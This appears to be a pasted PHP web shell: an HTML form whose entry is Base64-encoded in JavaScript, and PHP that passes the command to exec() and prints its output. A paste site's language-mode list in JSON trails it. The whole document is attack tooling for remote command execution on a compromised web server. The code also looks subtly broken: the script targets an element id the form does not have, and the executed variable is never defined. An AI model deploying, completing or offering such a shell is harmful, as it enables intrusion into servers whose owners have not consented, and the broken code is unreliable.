<title>PHP Web Shell</title>
<html>
<body>
<!-- Replaces command with Base64-encoded Data -->
<script>
window.onload = function() {
document.getElementById('execute_form').onsubmit = function () {
var command = document.getElementById('cmd');
command.value = window.btoa(command.value);
};
};
</script>
<!-- HTML Form for inputting desired command -->
<form id="execute_form" autocomplete="off">
<b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
<input type="submit" value="Execute" />
</form>
<!-- PHP code that executes command and outputs cleanly -->
<?php
echo "<b>Executed:</b> $decoded_command";
echo "<b>Output:</b>";
exec($decoded_command . " 2>&1", $output, $return_status);
if (isset($return_status)):
if ($return_status !== 0):
echo "<font color='red'>Error in Code Execution --> </font>";
foreach ($output as &$line) {
echo "$line <br>";
};
elseif ($return_status == 0 && empty($output)):
echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
else:
foreach ($output as &$line) {
echo "$line <br>";
};
endif;
endif;
?>
</body>
</html>
{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}